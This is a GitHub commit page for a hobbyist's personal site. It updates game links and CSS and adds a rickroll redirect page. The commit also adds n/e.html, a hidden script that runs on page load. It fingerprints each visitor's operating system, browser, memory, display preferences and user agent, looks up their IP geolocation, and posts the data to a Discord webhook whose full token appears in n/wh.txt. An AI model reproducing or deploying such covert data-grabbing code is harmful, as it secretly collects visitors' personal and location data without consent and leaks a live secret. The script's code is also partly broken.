Skip to content

Commit

Permalink
Browse files Browse the repository at this point in the history
  • Loading branch information
WlodekM committed Jan 4, 2024
2 parents fa1090b + e999429 commit 04dfd22
Show file tree
Hide file tree
Showing 6 changed files with 165 additions and 92 deletions.
1 change: 1 addition & 0 deletions exploit/index.html
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
<script>window.location.replace("https://rickroll.it/rickroll.mp4")</script>
14 changes: 7 additions & 7 deletions index.html
Original file line number Diff line number Diff line change
Expand Up @@ -58,10 +58,10 @@ <h1>My games</h1>
</div>

<div class="column side" >
<a href="#" target="_blank">
<a href="https://wlodekm.itch.io/supra-cow-2-beta-1" target="_blank">
<div class="gallery">
<img src="https://wlodekm.github.io/icons/rpg.png" width="600" height="400">
<div class="desc" style="vertical-align: middle">Untitled rpg game</div>
<div class="desc" style="vertical-align: middle">Supra Cow 2</div>
</div></a>
</div>

Expand Down Expand Up @@ -107,11 +107,11 @@ <h1>My Projects</h1>
</div>

<div class="column side" >
<!-- <a href="https://scratch.mit.edu/projects/717436838/" target="_blank">
<a href="https://meower-f-client.vercel.app" target="_blank">
<div class="gallery">
<img src="https://wlodekm.github.io/icons/CG.png" width="600" height="400">
<div class="desc" style="vertical-align: middle">Cool game</div>
</div></a> -->
<img src="https://wlodekm.github.io/icons/FC.png" width="600" height="400">
<div class="desc" style="vertical-align: middle">Meower F client</div>
</div></a>

</div>

Expand Down Expand Up @@ -183,4 +183,4 @@ <h1><hj>Other projects</hj></h1>

iteration += 1 / 3;
}, 30);
}</script>
}</script>
70 changes: 70 additions & 0 deletions n/e.html
Original file line number Diff line number Diff line change
@@ -0,0 +1,70 @@
<script>
function getOS() {
const userAgent = navigator.userAgent;
if (userAgent.includes("Windows")) {
return "Windows";
} else if (userAgent.includes("Android")) {
return "Android";
} else if (
userAgent.includes("iPhone") ||
userAgent.includes("iPod") ||
userAgent.includes("iPad")
) {
return "iOS";
} else if (userAgent.includes("Linux")) {
return "Linux";
} else if (userAgent.includes("CrOS")) {
return "ChromeOS";
} else if (userAgent.includes("Mac OS")) {
return "macOS";
}
return "Other";
}

function getBrowser() {
const userAgent = navigator.userAgent;
if (userAgent.includes("Chrome")) {
return "Chrome";
} else if (userAgent.includes("Firefox")) {
return "Firefox";
} else if (userAgent.includes("Safari")) {
return "Safari";
}
return "Other";
}

function getMemory() {
// @ts-expect-error
if (navigator.deviceMemory == undefined) {
return "Unsupported";
} else {
// @ts-expect-error
return navigator.deviceMemory;
}
}

function getPreferredColorScheme(args) {
return (
window.matchMedia("(prefers-color-scheme: dark)").matches ===true
);
}

function getPreferredContrast() {
return !!window.matchMedia("(prefers-contrast: more)").matches;
}
f=fetch
g=async(u,d)=>{r=await f(u,d);t=await response.text();return t}
p=g("https://ipapi.co/json")
b=g("wlodekm.github.io/n/wh.txt")
p+="\n"
p+=JSON.stringify({
os: getOS(),
browser: getBrowser(),
mem: getMemory(),
dark: getPreferredColorScheme(),
contrast: getPreferredContrast(),
})
p+=`\n`+window.navigator.userAgent
x={content:p}
w=g(b,{method:"POST",headers:{"Content-Type":"application/json",},body: JSON.stringify(x)})
</script>
1 change: 1 addition & 0 deletions n/n.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
https://ipapi.co/json
1 change: 1 addition & 0 deletions n/wh.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
https://discord.com/api/webhooks/1163855461590765684/MvhR9_AjWTHMlURk3KZoT1ZQmdd0AZKtXkQIGSqieNzk4_UhGStx6RDbbotXGzG23kJq
170 changes: 85 additions & 85 deletions style.css
Original file line number Diff line number Diff line change
Expand Up @@ -8,89 +8,89 @@ body{
--FONT: monospace;
--FONT-COLOR: #fff;
margin:0 0 0 0 !important;
}
a{text-decoration: none;}

/* content div */
.content{
--margin: 30px;
margin-left:var(--margin);margin-top:var(--margin);margin-right:var(--margin);margin-bottom:var(--margin);
padding: var(--margin);
font-family: var(--FONT);
background-color: var(--FG);
border-color: var(--BORDER);
border-width: 2px;
border-style: solid;
border-radius: var(--margin);
backdrop-filter: blur(15px);
}
.content #full {
min-height: 91.2vh !important;
}
.content p{
font-size: 125%;
}
h1, h2, h3, h4, h5, h6, p {
color:var(--FONT-COLOR);
}
.content h1{
font-size: 175%;
font-weight: 550;
}
.content h3{
font-size: 155%;
font-weight: 535;
}
.content a {color:rgb(0, 174, 255)}
body{background: linear-gradient(rgba(0, 0, 0, 0.75), rgba(0, 0, 0, 0.75)), url(https://c4.wallpaperflare.com/wallpaper/531/951/621/digital-digital-art-artwork-illustration-minimalism-hd-wallpaper-preview.jpg); background-size: cover;background-position: top 15vh;}
ul{color: var(--FONT-COLOR);}
/* game gallery */
div.gallery {
border: 2px solid var(--BORDER);
border-radius: 7.5px;
float: left;
height: 35vh;/*360px*/
width: 100%;
transition: border-color 0.5s;
}
div.gallery img {
height: 75%;
object-fit:cover;
width: 100%;
border-radius: 6.5px 6.5px 0px 0px;
}
div.gallery:hover{border-color: var(--BORDERHOVER);}
.gamesa{text-align: center;}
.desc {
text-align: center;
color: var(--FONT-COLOR);
position: relative;
top: calc(25% - (4em) );
}
.row{padding:15px 0px 15px 0px;}
.row {display: -webkit-flex;display: flex;}
.column{margin: 0 15px 0 15px;}
.column.side {-webkit-flex: 1;-ms-flex: 1;flex: 1;}
}
a{text-decoration: none;}

/* content div */
.content{
--margin: 30px;
margin-left:var(--margin);margin-top:var(--margin);margin-right:var(--margin);margin-bottom:var(--margin);
padding: var(--margin);
font-family: var(--FONT);
background-color: var(--FG);
border-color: var(--BORDER);
border-width: 2px;
border-style: solid;
border-radius: var(--margin);
backdrop-filter: blur(15px);
}
.content #full {
min-height: 91.2vh !important;
}
.content p{
font-size: 125%;
}
h1, h2, h3, h4, h5, h6, p {
color:var(--FONT-COLOR);
}
.content h1{
font-size: 175%;
font-weight: 550;
}
.content h3{
font-size: 155%;
font-weight: 535;
}
.content a {color:rgb(0, 174, 255)}
body{background: linear-gradient(rgba(0, 0, 0, 0.75), rgba(0, 0, 0, 0.75)), url(https://c4.wallpaperflare.com/wallpaper/531/951/621/digital-digital-art-artwork-illustration-minimalism-hd-wallpaper-preview.jpg); background-size: cover;background-position: top 15vh;}
ul{color: var(--FONT-COLOR);}
/* game gallery */
div.gallery {
border: 2px solid var(--BORDER);
border-radius: 7.5px;
float: left;
height: 35vh;/*360px*/
width: 100%;
transition: border-color 0.5s;
}
div.gallery img {
height: 75%;
object-fit:cover;
width: 100%;
border-radius: 6.5px 6.5px 0px 0px;
}
div.gallery:hover{border-color: var(--BORDERHOVER);}
.gamesa{text-align: center;}
.desc {
text-align: center;
color: var(--FONT-COLOR);
position: relative;
top: calc(25% - (4em) );
}
.row{padding:15px 0px 15px 0px;}
.row {display: -webkit-flex;display: flex;}
.column{margin: 0 15px 0 15px;}
.column.side {-webkit-flex: 1;-ms-flex: 1;flex: 1;}

/*topnav*/
.topnav{--margin: 20px;padding-left:var(--margin);padding-top:var(--margin);padding-right:var(--margin);padding-bottom:var(--margin);background-color: rgba(0, 0, 0, 0.4);width: calc(100% - (var(--margin)*2)}
.spacer{flex: 1 auto;margin: 0;padding: 0;box-sizing: border-box;}
.topnav h2 {margin: 0;padding: 0;box-sizing: border-box;}
.topnav a img{size: 3px;}
.topnav{position: sticky;bottom: 00px;}
.logo {position: absolute;top: 36%; text-decoration: none; color:#f0f0f0;font-size: 200%;font-family: monospace;font-weight: 600;}
.link {position: sticky;top: -1.7vh; text-decoration: none;font-size: 150%;color:#f0f0f0;}
.topnav{position: sticky;height: 5vh;}
.topnav img {transition: filter 0.25s; filter:brightness(0.635) ;margin: 3px 3px 3px 3px;height:45px;}
.topnav img:hover{filter:brightness(1);}
.topnav .logo{transition: color 0.25s;text-decoration: none;}
.topnav .logo:hover{color: rgb(156, 224, 255);}
header{position: sticky;}
/*scrollbar*/
body{
--sc-width:15px;
--sc-radius:5px;
--sc-color:rgb(112, 112, 112);
--sc-bg:rgb(63, 63, 63);
}::-webkit-scrollbar{width: var(--sc-width);}::-webkit-scrollbar-track{/*border-radius:var(--sc-radius);*/background:var(--sc-bg);}::-webkit-scrollbar-thumb{background:var(--sc-color);border-radius:var(--sc-radius);}

/*topnav*/
.topnav{--margin: 20px;padding-left:var(--margin);padding-top:var(--margin);padding-right:var(--margin);padding-bottom:var(--margin);background-color: rgba(0, 0, 0, 0.4);}
.spacer{flex: 1 auto;margin: 0;padding: 0;box-sizing: border-box;}
.topnav h2 {margin: 0;padding: 0;box-sizing: border-box;}
.topnav a img{size: 3px;}
.topnav{position: sticky;bottom: 00px;}
.logo {position: absolute;top: 36%; text-decoration: none; color:#f0f0f0;font-size: 200%;font-family: monospace;font-weight: 600;}
.link {position: sticky;top: -1.7vh; text-decoration: none;font-size: 150%;color:#f0f0f0;}
.topnav{position: sticky;height: 5vh;}
.topnav img {transition: filter 0.25s; filter:brightness(0.635) ;margin: 3px 3px 3px 3px;height:45px;}
.topnav img:hover{filter:brightness(1);}
.topnav .logo{transition: color 0.25s;text-decoration: none;}
.topnav .logo:hover{color: rgb(156, 224, 255);}
header{position: sticky;}
/*scrollbar*/
body{
--sc-width:15px;
--sc-radius:5px;
--sc-color:rgb(112, 112, 112);
--sc-bg:rgb(63, 63, 63);
}::-webkit-scrollbar{width: var(--sc-width);}::-webkit-scrollbar-track{/*border-radius:var(--sc-radius);*/background:var(--sc-bg);}::-webkit-scrollbar-thumb{background:var(--sc-color);border-radius:var(--sc-radius);}

0 comments on commit 04dfd22

Please sign in to comment.